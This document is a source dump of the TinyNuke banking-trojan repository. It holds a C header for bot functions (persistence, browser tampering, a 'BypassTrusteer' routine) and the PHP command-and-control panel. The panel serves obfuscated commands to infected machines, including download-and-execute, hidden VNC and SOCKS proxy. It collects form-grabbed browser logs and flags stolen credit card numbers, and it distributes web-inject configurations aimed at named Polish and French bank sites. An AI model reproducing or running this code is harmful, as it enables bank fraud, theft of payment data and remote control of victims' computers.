33 | GlobalSection(SolutionProperties) = preSolution 34 | HideSolutionNode = FALSE 35 | EndGlobalSection 36 | EndGlobal 37 | -------------------------------------------------------------------------------- /TinyNuke.v11.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/TinyNuke.v11.suo -------------------------------------------------------------------------------- /Utils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Common.h" 3 | 4 | #define BOT_ID_LEN 35 5 | 6 | void GetBotId(char *botId); 7 | void Obfuscate(BYTE *buffer, DWORD bufferSize, char *key); 8 | char *Utf16toUtf8(wchar_t *utf16); 9 | wchar_t *Utf8toUtf16(char *utf8); 10 | char *UnEnc(char *enc, char *key, DWORD encLen); 11 | void GetInstallPath(char *installPath); 12 | BOOL GetUserSidStr(PCHAR *sidStr); 13 | HANDLE NtRegOpenKey(PCHAR subKey); 14 | void SetStartupValue(char *path); 15 | BOOL VerifyPe(BYTE *pe, DWORD peSize); 16 | BOOL IsProcessX64(HANDLE hProcess); 17 | void *Alloc(size_t size); 18 | void *AllocZ(size_t size); 19 | void *ReAlloc(void *mem, size_t size); 20 | DWORD GetPidExplorer(); 21 | void SetFirefoxPrefs(); 22 | void DisableMultiProcessesAndProtectedModeIe(); 23 | void GetDlls(BYTE **x86, BYTE **x64, BOOL update); 24 | void GetTempPathBotPrefix(char *path); 25 | DWORD BypassTrusteer(PROCESS_INFORMATION *processInfo, char *browserPath, char *browserCommandLine); 26 | void CopyDir(char *from, char *to); -------------------------------------------------------------------------------- /enc.cmd: -------------------------------------------------------------------------------- 1 | AutoEncrypt.exe Api.cpp -------------------------------------------------------------------------------- /panel/bots.php: -------------------------------------------------------------------------------- 1 | 8 |
9 |
Search
10 |
11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 21 | 33 | 34 |
Country Codes
UHIDs
IPs
20 | 22 | 23 | Order By 24 | 28 | 32 |
35 |
36 |
37 | bindValue(++$i, $country, PDO::PARAM_STR); 66 | } 67 | if($_GET['uhids'] != '') 68 | { 69 | foreach($uhids as $uhid) 70 | $query->bindValue(++$i, $uhid, PDO::PARAM_STR); 71 | } 72 | if($_GET['ips'] != '') 73 | { 74 | foreach($ips as $ip) 75 | $query->bindValue(++$i, $ip, PDO::PARAM_INT); 76 | } 77 | } 78 | 79 | $query = $db->prepare('SELECT COUNT(*) FROM bots WHERE 1 = 1'.$sqlWhere); 80 | $i = 0; 81 | bind_values(); 82 | $query->execute(); 83 | $total = $query->fetchColumn(); 84 | if($total == 0) 85 | echo('
No bots found
'); 86 | else 87 | { 88 | get_pag_vars($total, $pages, $page, $offset); 89 | $query = $db->prepare('SELECT * FROM bots WHERE 1 = 1'.$sqlWhere.' ORDER BY '.($_GET['order'] == 1 ? 'first_seen' : 'last_seen').' 90 | '.($_GET['dir'] == 1 ? 'ASC' : 'DESC').' LIMIT ? OFFSET ?'); 91 | $i = 0; 92 | bind_values(); 93 | $query->bindValue(++$i, $CONST_PAGE_LIMIT, PDO::PARAM_INT); 94 | $query->bindValue(++$i, $offset, PDO::PARAM_INT); 95 | $query->execute(); 96 | ?> 97 |
98 |
Results
99 | 100 | 101 | fetchAll(); 103 | $geoip = new GeoIP(); 104 | foreach($rows as $row) 105 | { 106 | ?> 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 120 | 123 | 126 | 127 | '); 130 | echo_pag_form($page, $pages); 131 | echo(''); 132 | } 133 | } 134 | ui_content_end(); 135 | ui_end(); 136 | ?> -------------------------------------------------------------------------------- /panel/client.php: -------------------------------------------------------------------------------- 1 | prepare('SELECT last_command FROM bots WHERE uhid = ?'); 47 | $query->bindValue(1, $uhid, PDO::PARAM_STR); 48 | $query->execute(); 49 | if($query->rowCount() === 0) 50 | { 51 | echo xor_obf('0', $key); 52 | exit(); 53 | } 54 | 55 | $last_command = $query->fetchColumn(); 56 | $country = get_country($ip); 57 | 58 | $query = $db->prepare('SELECT * FROM commands WHERE (execs <= `limit` OR `limit` = 0) AND enabled = 1 AND (id > ? OR ? = 0)'); 59 | $query->bindValue(1, $last_command, PDO::PARAM_INT); 60 | $query->bindValue(2, $last_command, PDO::PARAM_INT); 61 | $query->execute(); 62 | $rows = $query->fetchAll(); 63 | $output = ''; 64 | foreach($rows as $row) 65 | { 66 | if($row['countries'] != '') 67 | { 68 | $countries = explode(' ', $row['countries']); 69 | if(!in_array($country, $countries)) 70 | continue; 71 | } 72 | if($row['uhids'] != '') 73 | { 74 | $uhids = explode(' ', $row['uhids']); 75 | if(!in_array($uhid, $uhids)) 76 | continue; 77 | } 78 | $query = $db->prepare('UPDATE commands SET execs = execs + 1 WHERE id = ?'); 79 | $query->bindValue(1, $row['id'], PDO::PARAM_INT); 80 | $query->execute(); 81 | $last_command = $row['id']; 82 | if($row['type'] == $CONST_COMMAND_HIDDEN_DESKTOP) 83 | $row['param'] = $CONF_SERVER_HIDDEN_DESKTOP; 84 | else 85 | if($row['type'] == $CONST_COMMAND_SOCKS) 86 | $row['param'] = $CONF_SERVER_SOCKS; 87 | $output .= $row['type'].'|'.$row['param']."\r\n"; 88 | } 89 | $query = $db->prepare('UPDATE bots SET last_seen = ?, ip = ?, country = ?, last_command = ? WHERE uhid = ?'); 90 | $query->bindValue(1, time(), PDO::PARAM_INT); 91 | $query->bindValue(2, $ipLong, PDO::PARAM_INT); 92 | $query->bindValue(3, $country, PDO::PARAM_STR); 93 | $query->bindValue(4, $last_command, PDO::PARAM_INT); 94 | $query->bindValue(5, $uhid, PDO::PARAM_STR); 95 | $query->execute(); 96 | echo xor_obf($output, $key); 97 | } 98 | else if($requestType == 'info') 99 | { 100 | $parts = explode('|', $parts[1]); 101 | $query = $db->prepare('INSERT INTO bots (uhid, os_major, os_minor, service_pack, is_server, ip, 102 | comp_name, user_name, is_x64, last_seen, first_seen, country, last_command) 103 | VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 0)'); 104 | $query->bindValue(1, $uhid, PDO::PARAM_STR); 105 | $query->bindValue(2, $parts[0], PDO::PARAM_INT); 106 | $query->bindValue(3, $parts[1], PDO::PARAM_INT); 107 | $query->bindValue(4, $parts[2], PDO::PARAM_INT); 108 | $query->bindValue(5, $parts[3], PDO::PARAM_INT); 109 | $query->bindValue(6, $ipLong, PDO::PARAM_INT); 110 | $query->bindValue(7, $parts[4], PDO::PARAM_STR); 111 | $query->bindValue(8, $parts[5], PDO::PARAM_STR); 112 | $query->bindValue(9, $parts[6], PDO::PARAM_INT); 113 | $time = time(); 114 | $query->bindValue(10, $time, PDO::PARAM_INT); 115 | $query->bindValue(11, $time, PDO::PARAM_INT); 116 | $query->bindValue(12, get_country($ip)); 117 | $query->execute(); 118 | } 119 | else if($requestType == 'injects') 120 | { 121 | $injects = file_get_contents($CONST_INJECTS_PATH); 122 | $injects = str_replace("%BOT_ID%", $uhid, $injects); 123 | $injects = str_replace("%COUNTRY%", get_country($ip), $injects); 124 | echo xor_obf($injects, $key); 125 | } 126 | else if($requestType == 'log') 127 | { 128 | $parts = explode('|', $parts[1], 4); 129 | $query = $db->prepare('INSERT INTO reports (uhid, software, url, inject, received, content, found_card) 130 | VALUES (?, ?, ?, ?, ?, ?, ?)'); 131 | $query->bindValue(1, $uhid, PDO::PARAM_STR); //UHID|Chrome|Url|Inject|Content 132 | $query->bindValue(2, $parts[0], PDO::PARAM_STR); 133 | $query->bindValue(3, $parts[1], PDO::PARAM_STR); 134 | $query->bindValue(4, $parts[2], PDO::PARAM_INT); 135 | $query->bindValue(5, time(), PDO::PARAM_INT); 136 | $query->bindValue(6, $parts[3], PDO::PARAM_STR); 137 | $query->bindValue(7, found_card($parts[3]), PDO::PARAM_INT); 138 | $query->execute(); 139 | } 140 | else if($requestType == 'bin') 141 | { 142 | $path = ''; 143 | if($parts[1] === 'int32') 144 | $path = $CONST_X86_BIN_PATH; 145 | else 146 | $path = $CONST_X64_BIN_PATH; 147 | $content = file_get_contents($path); 148 | echo xor_obf($content, $key); 149 | } 150 | ?> -------------------------------------------------------------------------------- /panel/commands.php: -------------------------------------------------------------------------------- 1 | prepare('DELETE FROM commands WHERE id = ?'); 11 | $query->bindValue(1, $_GET['delete'], PDO::PARAM_INT); 12 | $query->execute(); 13 | header('location: commands.php'); 14 | exit(); 15 | } 16 | 17 | if(isset($_GET['toggle'])) 18 | { 19 | action_sec_check(); 20 | $query = $db->prepare('UPDATE commands SET enabled = NOT enabled WHERE id = ?'); 21 | $query->bindValue(1, $_GET['toggle'], PDO::PARAM_INT); 22 | $query->execute(); 23 | header('location: commands.php'); 24 | exit(); 25 | } 26 | 27 | if(isset($_POST['type'])) 28 | { 29 | action_sec_check(); 30 | $query = $db->prepare('INSERT INTO commands (`type`, param, created, `limit`, countries, uhids, execs, enabled) 31 | VALUES (?, ?, ?, ?, ?, ?, 0, 0)'); 32 | $query->bindValue(1, $_POST['type'], PDO::PARAM_INT); 33 | $query->bindValue(2, $_POST['param'], PDO::PARAM_STR); 34 | $query->bindValue(3, time(), PDO::PARAM_INT); 35 | $query->bindValue(4, (int) $_POST['limit'], PDO::PARAM_INT); 36 | $query->bindValue(5, $_POST['countries'], PDO::PARAM_STR); 37 | $query->bindValue(6, $_POST['uhids'], PDO::PARAM_STR); 38 | $query->execute(); 39 | header('location: commands.php'); 40 | exit(); 41 | } 42 | 43 | function get_command_name($type) 44 | { 45 | global 46 | $CONST_COMMAND_DL_EXEC, 47 | $CONST_COMMAND_HIDDEN_DESKTOP, 48 | $CONST_COMMAND_SOCKS, 49 | $CONST_COMMAND_UPDATE; 50 | switch($type) 51 | { 52 | case $CONST_COMMAND_DL_EXEC: return 'Download & Execute'; 53 | case $CONST_COMMAND_HIDDEN_DESKTOP: return 'Start VNC'; 54 | case $CONST_COMMAND_SOCKS: return 'Start Socks'; 55 | case $CONST_COMMAND_UPDATE: return 'Update'; 56 | default: return '?'; 57 | } 58 | } 59 | ?> 60 |
61 |
Create
62 |
63 | 64 |
UHIDIPCountryOSComputerUsernameLast SeenFirst Seen
('.$geoip->GEOIP_COUNTRY_NAMES[$geoip->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['country']]].')'); ?> 0 ? ' SP'.$row['service_pack'] : '').' '.($row['is_x64'] ? 'x64' : 'x86')); ?> 115 | '.time_since($row['last_seen']).''); ?> 116 | 117 | 118 | 119 | 121 | '.time_since($row['first_seen']).''); ?> 122 | 124 | Command 125 |
65 | 66 | 67 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 94 | 95 |
Type 68 | 74 |
Execution Limit
Country Codes
UHIDs
Parameter
92 | 93 |
96 | 97 |
98 | query('SELECT * FROM commands'); 100 | if($query->rowCount() > 0) 101 | { 102 | ?> 103 |
104 |
Commands
105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | fetchAll(); 116 | foreach($rows as $row) 117 | { 118 | $emptyHtml = ''; 119 | 120 | if($row['param'] == '') 121 | $param = $emptyHtml; 122 | else 123 | { 124 | $param = htmlspecialchars(substr($row['param'], 0, 30)); 125 | if(strlen($param) < strlen($row['param'])) 126 | $param = ''; 127 | } 128 | echo(' 129 | 130 | 131 | 132 | 133 | 134 | 135 | 146 | '); 147 | } 148 | } 149 | ?> 150 |
TypeCreatedCountry CodesUHIDsExecutedParameter
'.get_command_name($row['type']).''.($row['countries'] == '' ? $emptyHtml : htmlspecialchars($row['countries'])).''.($row['uhids'] == '' ? $emptyHtml : htmlspecialchars($row['uhids'])).''.$row['execs'].' / '.($row['limit'] == 0 ? '∞' : $row['limit']).''.$param.' 136 | 138 | '.($row['enabled'] ? 'Disable' : 'Enable').' 139 | 140 | 141 | 143 | Delete 144 | 145 |
151 |
152 | -------------------------------------------------------------------------------- /panel/db.sql: -------------------------------------------------------------------------------- 1 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 2 | /*!40101 SET NAMES utf8 */; 3 | /*!50503 SET NAMES utf8mb4 */; 4 | /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; 5 | /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; 6 | 7 | DROP DATABASE IF EXISTS `panel`; 8 | CREATE DATABASE IF NOT EXISTS `panel` /*!40100 DEFAULT CHARACTER SET latin1 */; 9 | USE `panel`; 10 | 11 | DROP TABLE IF EXISTS `bots`; 12 | CREATE TABLE IF NOT EXISTS `bots` ( 13 | `id` int(11) unsigned NOT NULL AUTO_INCREMENT, 14 | `uhid` varchar(50) NOT NULL, 15 | `os_major` tinyint(4) unsigned NOT NULL, 16 | `os_minor` tinyint(4) unsigned NOT NULL, 17 | `service_pack` tinyint(4) unsigned NOT NULL, 18 | `is_server` tinyint(4) unsigned NOT NULL, 19 | `comp_name` varchar(50) NOT NULL, 20 | `user_name` varchar(50) NOT NULL, 21 | `ip` int(11) unsigned NOT NULL, 22 | `is_x64` tinyint(4) unsigned NOT NULL, 23 | `last_seen` int(11) unsigned NOT NULL, 24 | `first_seen` int(11) unsigned NOT NULL, 25 | `country` char(2) NOT NULL, 26 | `last_command` int(11) unsigned NOT NULL, 27 | PRIMARY KEY (`id`), 28 | UNIQUE KEY `uhid` (`uhid`) 29 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 30 | 31 | DROP TABLE IF EXISTS `commands`; 32 | CREATE TABLE IF NOT EXISTS `commands` ( 33 | `id` int(11) unsigned NOT NULL AUTO_INCREMENT, 34 | `execs` int(11) unsigned NOT NULL, 35 | `limit` int(11) unsigned NOT NULL, 36 | `enabled` tinyint(4) unsigned NOT NULL, 37 | `created` int(11) unsigned NOT NULL, 38 | `type` tinyint(4) unsigned NOT NULL, 39 | `param` text NOT NULL, 40 | `countries` text NOT NULL, 41 | `uhids` text NOT NULL, 42 | PRIMARY KEY (`id`) 43 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 44 | 45 | DROP TABLE IF EXISTS `reports`; 46 | CREATE TABLE IF NOT EXISTS `reports` ( 47 | `id` int(11) unsigned NOT NULL AUTO_INCREMENT, 48 | `uhid` varchar(50) NOT NULL, 49 | `software` varchar(20) NOT NULL, 50 | `url` varchar(100) NOT NULL, 51 | `received` int(11) unsigned NOT NULL, 52 | `content` text NOT NULL, 53 | `inject` tinyint(4) unsigned NOT NULL, 54 | `found_card` tinyint(4) unsigned NOT NULL, 55 | PRIMARY KEY (`id`) 56 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 57 | 58 | /*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */; 59 | /*!40014 SET FOREIGN_KEY_CHECKS=IF(@OLD_FOREIGN_KEY_CHECKS IS NULL, 1, @OLD_FOREIGN_KEY_CHECKS) */; 60 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 61 | -------------------------------------------------------------------------------- /panel/geoip.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/panel/geoip.dat -------------------------------------------------------------------------------- /panel/inc/cc.php: -------------------------------------------------------------------------------- 1 | "(4\d{12}(?:\d{3})?)", 7 | "amex" => "(3[47]\d{13})", 8 | "jcb" => "(35[2-8][89]\d\d\d{10})", 9 | "maestro" => "((?:5020|5038|6304|6579|6761)\d{12}(?:\d\d)?)", 10 | "solo" => "((?:6334|6767)\d{12}(?:\d\d)?\d?)", 11 | "mastercard" => "(5[1-5]\d{14})", 12 | "switch" => "(?:(?:(?:4903|4905|4911|4936|6333|6759)\d{12})|(?:(?:564182|633110)\d{10})(\d\d)?\d?)", 13 | ); 14 | $names = array("Visa", "American Express", "JCB", "Maestro", "Solo", "Mastercard", "Switch"); 15 | $matches = array(); 16 | $pattern = "#^(?:".implode("|", $cards).")$#"; 17 | $result = preg_match($pattern, str_replace(" ", "", $cc), $matches); 18 | if($extra_check && $result > 0) 19 | $result = (validatecard($cc)) ? 1 : 0; 20 | return ($result > 0) ? $names[sizeof($matches) - 2] : false; 21 | } 22 | 23 | function is_valid_luhn($number) 24 | { 25 | settype($number, 'string'); 26 | $sumTable = array 27 | ( 28 | array(0, 1, 2, 3, 4, 5, 6, 7, 8, 9), 29 | array(0, 2, 4, 6, 8, 1, 3, 5, 7, 9) 30 | ); 31 | $sum = 0; 32 | $flip = 0; 33 | for($i = strlen($number) - 1; $i >= 0; $i--) 34 | $sum += $sumTable[$flip++ & 0x1][$number[$i]]; 35 | return $sum % 10 === 0; 36 | } 37 | 38 | function is_valid_card($str) 39 | { 40 | $strLen = strlen($str); 41 | if($strLen >= 13 && $strLen <= 19) 42 | { 43 | if(is_valid_luhn($str) && check_cc($str) !== false) 44 | return true; 45 | } 46 | return false; 47 | } 48 | 49 | function found_card($str) 50 | { 51 | $str = strstr($str, "\r\n\r\n"); 52 | $currNum = ''; 53 | for($i = 0; $i < strlen($str); ++$i) 54 | { 55 | if(ctype_digit($str[$i])) 56 | $currNum .= $str[$i]; 57 | else if($str[$i] != '+') 58 | { 59 | if(is_valid_card($currNum)) 60 | return true; 61 | $currNum = ''; 62 | } 63 | } 64 | if(is_valid_card($currNum)) 65 | return true; 66 | return false; 67 | } 68 | ?> -------------------------------------------------------------------------------- /panel/inc/common.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /panel/inc/const.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /panel/inc/db.php: -------------------------------------------------------------------------------- 1 | 'SET NAMES "utf8"')); 9 | } 10 | catch(PDOException $e) 11 | { 12 | if($message) 13 | echo 'Can\'t connect to the database. Change settings?'; 14 | exit(); 15 | } 16 | } 17 | ?> -------------------------------------------------------------------------------- /panel/inc/ui.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 | TinyNuke - <?php echo($title); ?> 9 | 10 | 11 | 17 | 18 | 19 | '.$text.''); 25 | } 26 | 27 | function ui_content_start() 28 | { 29 | ?> 30 |
31 | 38 |
39 |
40 | 46 |
47 |
48 |
NNloader Panel
49 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /panel/inc/utils.php: -------------------------------------------------------------------------------- 1 | No file uploaded'); 28 | } 29 | 30 | function gen_qmarks($arr) 31 | { 32 | return str_repeat('?, ', count($arr) - 1).'?'; 33 | } 34 | 35 | function get_pag_vars($total, &$pages, &$page, &$offset) 36 | { 37 | global $CONST_PAGE_LIMIT; 38 | $pages = ceil($total / $CONST_PAGE_LIMIT); 39 | $page = 1; 40 | if(isset($_GET['page'])) 41 | { 42 | $page = (int) $_GET['page']; 43 | if($page > $pages) 44 | $page = $pages; 45 | else if($page < 1) 46 | $page = 1; 47 | } 48 | $offset = ($page - 1) * $CONST_PAGE_LIMIT; 49 | } 50 | 51 | function get_os($majorVer, $minorVer, $server) 52 | { 53 | if($majorVer == 5) 54 | { 55 | if(!$server) 56 | return 'Windows XP'; 57 | else 58 | return 'Windows 2003'; 59 | } 60 | if($majorVer == 6 && $minorVer == 0) 61 | { 62 | if(!$server) 63 | return 'Windows Vista'; 64 | else 65 | return 'Windows Server 2008'; 66 | } 67 | if($majorVer == 6 && $minorVer == 1) 68 | { 69 | if(!$server) 70 | return 'Windows 7'; 71 | else 72 | return 'Windows Server 2008 R2'; 73 | } 74 | if($majorVer == 6 && $minorVer == 2) 75 | { 76 | if(!$server) 77 | return 'Windows 8'; 78 | else 79 | return 'Windows Server 2012'; 80 | } 81 | if($majorVer == 6 && $minorVer == 3) 82 | { 83 | if(!$server) 84 | return 'Windows 8.1'; 85 | else 86 | return 'Windows Server 2012 R2'; 87 | } 88 | if($majorVer == 10 && $minorVer == 0) 89 | { 90 | if(!$server) 91 | return 'Windows 10'; 92 | else 93 | return 'Windows Server 2016'; 94 | } 95 | else 96 | return '?'; 97 | } 98 | 99 | function format_time($time) 100 | { 101 | return date('d/m/Y H:i:s', $time); 102 | } 103 | 104 | function time_since($time) 105 | { 106 | $time = time() - $time; 107 | $time = ($time < 1) ? 1 : $time; 108 | $tokens = array ( 109 | 31536000 => 'year', 110 | 2592000 => 'month', 111 | 604800 => 'week', 112 | 86400 => 'day', 113 | 3600 => 'hour', 114 | 60 => 'minute', 115 | 1 => 'second' 116 | ); 117 | 118 | foreach($tokens as $unit => $text) 119 | { 120 | if($time < $unit) continue; 121 | $numberOfUnits = floor($time / $unit); 122 | return $numberOfUnits.' '.$text.(($numberOfUnits > 1) ? 's' : '').' ago'; 123 | } 124 | } 125 | 126 | function is_online($time) 127 | { 128 | global $CONF_TIMEOUT_OFFLINE; 129 | return (time() - $time) < $CONF_TIMEOUT_OFFLINE ; 130 | } 131 | 132 | function echo_hidden_fields() 133 | { 134 | $args = func_get_args(); 135 | foreach($_GET as $name => $value) 136 | { 137 | if(!in_array($name, $args)) 138 | echo(''); 139 | } 140 | } 141 | 142 | function echo_pag_form($page, $pages) 143 | { 144 | $firstDisabled = $page == 1 ? 'disabled' : ''; 145 | echo('
First'); 146 | echo(' Previous'); 147 | echo_hidden_fields('page'); 148 | echo(' '); 150 | $lastDisabled = $page == $pages ? 'disabled' : ''; 151 | echo(' Next'); 152 | echo(' Last
'); 153 | } 154 | 155 | function add_get_param($name, $value) 156 | { 157 | $params = $_GET; 158 | unset($params[$name]); 159 | $params[$name] = $value; 160 | return basename($_SERVER['PHP_SELF']).'?'.http_build_query($params); 161 | } 162 | 163 | function action_sec_check() 164 | { 165 | if($_SERVER['REQUEST_METHOD'] == 'POST') 166 | $userTime = $_POST['time']; 167 | else 168 | $userTime = $_GET['time']; 169 | if($userTime != $_SESSION['time']) 170 | exit(); 171 | } 172 | ?> -------------------------------------------------------------------------------- /panel/index.php: -------------------------------------------------------------------------------- 1 | '); 18 | header('location: index.php'); 19 | exit(); 20 | } 21 | if(isset($_GET['delete_host'])) 22 | { 23 | action_sec_check(); 24 | $hosts = array_diff($hosts, array($_GET['delete_host'])); 25 | if($hosts == null) 26 | $hosts = array(); 27 | delete_insert_host(); 28 | } 29 | else if(isset($_POST['host'])) 30 | { 31 | action_sec_check(); 32 | array_push($hosts, $_POST['host']); 33 | delete_insert_host(); 34 | } 35 | 36 | ui_start('Statistics'); 37 | ui_content_start(); 38 | 39 | function format_count($count) 40 | { 41 | global $total; 42 | if($total == 0 && $count == 0) 43 | $total = 1; 44 | return $count.' ('.round(($count / $total) * 100, 2).'%)'; 45 | } 46 | 47 | $query = $db->query('SELECT COUNT(*) FROM bots'); 48 | $totalBots = $query->fetchColumn(); 49 | 50 | $total = $totalBots; 51 | 52 | if($total == 0) 53 | echo('
Database is empty
'); 54 | else 55 | { 56 | ?> 57 | 82 |
83 | prepare('SELECT COUNT(*) FROM bots WHERE last_seen > ?'); 85 | $query->bindValue(1, time() - $CONF_TIMEOUT_OFFLINE, PDO::PARAM_INT); 86 | $query->execute(); 87 | $online = (int) $query->fetchColumn(); 88 | $offline = $total - $online; 89 | 90 | $query = $db->prepare('SELECT COUNT(*) FROM bots WHERE last_seen < ?'); 91 | $query->bindValue(1, time() - $CONF_TIMEOUT_DEAD, PDO::PARAM_INT); 92 | $query->execute(); 93 | $dead = $query->fetchColumn(); 94 | 95 | $query = $db->prepare('SELECT COUNT(*) FROM bots WHERE last_seen > ?'); 96 | $query->bindValue(1, time() - 60 * 60 * 24, PDO::PARAM_INT); 97 | $query->execute(); 98 | $online24h = (int) $query->fetchColumn(); 99 | ?> 100 |
101 |
Amount
102 | 103 | 104 | 105 | 106 | 107 | 108 |
Total:
Online:
Offline:
Bots seen since 24h:
Dead:
109 |
110 | query('SELECT COUNT(*) FROM bots WHERE is_x64 = 1'); 112 | $x64 = $query->fetchColumn(); 113 | 114 | $os = array(); 115 | $query = $db->query('SELECT os_major, os_minor, is_server FROM bots'); 116 | $rows = $query->fetchAll(); 117 | foreach($rows as $row) 118 | { 119 | $osName = get_os($row['os_major'], $row['os_minor'], $row['is_server']); 120 | if(isset($os[$osName])) 121 | ++$os[$osName]; 122 | else 123 | $os[$osName] = 1; 124 | } 125 | arsort($os); 126 | ?> 127 |
128 |
Computer Info
129 | 130 | $value) 132 | echo(''); 133 | ?> 134 | 135 | 136 |
'.$key.':'.format_count($value).'
x64:
x86:
137 |
138 |
139 |
Countries
140 | 141 | query('SELECT DISTINCT country, COUNT(*) as num FROM bots GROUP BY country ORDER BY num DESC'); 144 | $rows = $query->fetchAll(); 145 | $geoip = new GeoIP(); 146 | foreach($rows as $row) 147 | { 148 | echo(''); 149 | } 150 | ?> 151 |
'.$row['country'].' ('.$geoip->GEOIP_COUNTRY_NAMES[$geoip->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['country']]].'):'.format_count($row['num']).'
152 |
153 |
154 | query('SELECT COUNT(*) FROM reports'); 156 | $total = $query->fetchColumn(); 157 | 158 | $query = $db->prepare('SELECT COUNT(*) FROM reports WHERE received > ?'); 159 | $query->bindValue(1, time() - 60 * 60 * 24, PDO::PARAM_INT); 160 | $query->execute(); 161 | $logs24h = $query->fetchColumn(); 162 | ?> 163 |
164 |
165 |
Logs
166 | 167 | 168 | 169 |
Total:
Last 24h:
170 |
171 |
172 |
Top Hosts
173 | 174 | '.htmlspecialchars($host).''); 179 | } 180 | $query = $db->query($sql_host.'GROUP BY host ORDER BY num DESC LIMIT 100'); 181 | $rows = $query->fetchAll(); 182 | foreach($rows as $row) 183 | { 184 | echo(''); 185 | echo_host_row($row['host'], $row['num']); 186 | echo(''); 187 | } 188 | ?> 189 |
'.$num.'
190 |
191 |
192 |
Pinned Hosts
193 | 0) 195 | { 196 | ?> 197 | 198 | prepare($sql_host.' GROUP BY host HAVING host LIKE ?'); 202 | $query->bindValue(1, $host, PDO::PARAM_STR); 203 | $query->execute(); 204 | echo(''); 205 | echo_host_row(htmlspecialchars($host), $query->rowCount() > 0 ? $query->fetchAll()[0]['num'] : 0); 206 | echo(''); 207 | } 208 | ?> 209 |
Delete
210 | 213 |
214 |
215 | 216 | 217 |
218 |
219 |
220 |
221 | -------------------------------------------------------------------------------- /panel/login.php: -------------------------------------------------------------------------------- 1 | '); 33 | ?> -------------------------------------------------------------------------------- /panel/pinned_hosts.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /panel/private/.htaccess: -------------------------------------------------------------------------------- 1 | deny from all -------------------------------------------------------------------------------- /panel/private/injects.json: -------------------------------------------------------------------------------- 1 | { 2 | "fg_blacklist": [ "*ocsp*.*", "*symc*.com*", "*clients*.google.com*", "*telemetry.mozilla.org*", "*facebook.com/ajax/*", "*safebrowsing.google.com*", "*services.mozilla.com*" ], 3 | "injects": 4 | [ 5 | { 6 | "host": "bosbank24.pl", 7 | "path": "*", 8 | "content": 9 | [ 10 | { 11 | "code": "", 12 | "before": "", 13 | "after": "" 14 | } 15 | ] 16 | }, 17 | { 18 | "host": "ebanknet.bsprudnik.pl", 19 | "path": "*", 20 | "content": 21 | [ 22 | { 23 | "code": "eBankNet", 24 | "before": "", 25 | "after": "" 26 | } 27 | ] 28 | }, 29 | { 30 | "host": "www.hsbc.fr", 31 | "path": "*", 32 | "content": 33 | [ 34 | { 35 | "code": "", 36 | "before": "", 37 | "after": "" 38 | } 39 | ] 40 | } 41 | ] 42 | } -------------------------------------------------------------------------------- /panel/reports.php: -------------------------------------------------------------------------------- 1 | prepare('SELECT content FROM reports WHERE id = ?'); 10 | $query->bindValue(1, $_GET['view_content'], PDO::PARAM_INT); 11 | $query->execute(); 12 | echo $query->fetchColumn(); 13 | exit(); 14 | } 15 | 16 | ui_start('Reports'); 17 | ui_content_start(); 18 | ?> 19 |
20 |
Search
21 |
22 | 23 | 24 | 25 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 99 | 100 |
Date 26 | prepare('SELECT received FROM reports ORDER BY received DESC LIMIT 1'); 28 | $query->execute(); 29 | $new_received = (int) $query->fetchColumn(); 30 | 31 | $query = $db->prepare('SELECT received FROM reports ORDER BY received ASC LIMIT 1'); 32 | $query->execute(); 33 | $old_received = (int) $query->fetchColumn(); 34 | 35 | function day_min($time) 36 | { 37 | return strtotime(date('Y-m-d 00:00:00', $time)); 38 | } 39 | 40 | function day_max($time) 41 | { 42 | return strtotime(date('Y-m-d 23:59:59', $time)); 43 | } 44 | $new_received_min = day_min($new_received); 45 | $old_received_min = day_min($old_received); 46 | ?> 47 | 55 | to 56 | 64 |
URL
Content
UHIDs
WebInject
Contains CC
89 | 90 | Order By 91 | 94 | 98 |
101 |
102 |
103 | $_GET['date_max']) 107 | echo('
First date can\'t be later then the second one
